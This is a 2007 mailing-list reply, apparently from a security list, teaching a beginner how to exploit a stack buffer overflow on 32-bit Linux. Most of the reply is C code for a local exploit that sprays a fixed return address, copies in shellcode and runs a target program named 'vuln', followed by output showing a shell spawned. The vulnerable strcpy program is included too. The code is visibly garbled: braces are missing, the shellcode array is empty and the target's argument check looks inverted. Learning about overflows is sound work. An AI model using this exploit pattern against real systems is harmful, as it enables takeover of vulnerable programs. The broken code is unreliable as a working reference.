Re: understanding buffer overflows

Subject: Re: understanding buffer overflows

Try this.. it is in C but you shouldn't have problems rewriting it.. 
In your example you are overrunning the buffer but you might not be overwriting the EIP .. try a bigger buffer 

Best Regards,


 Overflow written for:

 x86 Pentium 4 
 Linux version 2.6.5-7.104-default
 gcc version 3.3.3 
 SuSE Linux

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define MAX_BUF 530
#define RETADDR 0xbffff0c0

int main()
       int i;

   char shellcode[] =

      char buffer[MAX_BUF];
      // fill the buffer with the return address
    //the address to be overwritten is 524 bytes from the addr of buffer
  for (i=0; i<MAX_BUF; i+=4)

                  *(long *)&buffer[i] = RETADDR;

      memcpy(buffer, shellcode, sizeof(shellcode));
        buffer[sizeof(shellcode)-1]='A'; //take care of an extra 0x00
      // I compiled the code provided as "vuln"

      execlp("./vuln", "vuln", buffer, NULL);


***@localhost:~> ./test 
sh-2.05b$ exit



#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo (char *input)
  char buffer [512];
  strcpy(buffer, input);
  return (0);

int main (int argc, char * argv[])

  if (argc > 1)
    printf("usage: %s string", argv[0]);
  exit (0);

- Show quoted text -

On 31 Oct 2007 14:36:22 -0000, <> wrote:

    hello, my name is michael, im from austria - so my english is very bad.

    A few days ago i begin to experiment with bufferoverflows in linux.

    i wrote a little c++ programm like this:

    #include < string.h>

    void main()


      char buffer[10];


    strcpy((char *)buffer,(char *)COPY);


    k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten

    so i put a few lines in the program to output addresses from functions and variables.

    addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)

    i think this is maybe the problem - but why?

    output from gdb:

    eax 0x0 0

    ecx 0x41414141 1094795585

    edx 0x1d7 471

    ebx 0xb7e27ff4 -1209892876

    esp 0x4141413d 0x4141413d

    ebp 0x41414141 0x41414141

    esi 0xb7f77ce0 -1208517408

    edi 0x0 0

    eip 0x80484ad 0x80484ad

    eflags 0x210286 [ PF SF IF RF ID ]

    cs 0x73 115

    ss 0x7b 123

    ds 0x7b 123

    es 0x7b 123

    fs 0x0 0

    gs 0x33 51

    hope anybody can help me understand/learn.

    greets from austria, michael

Copyright © 1995-2020 All rights reserved.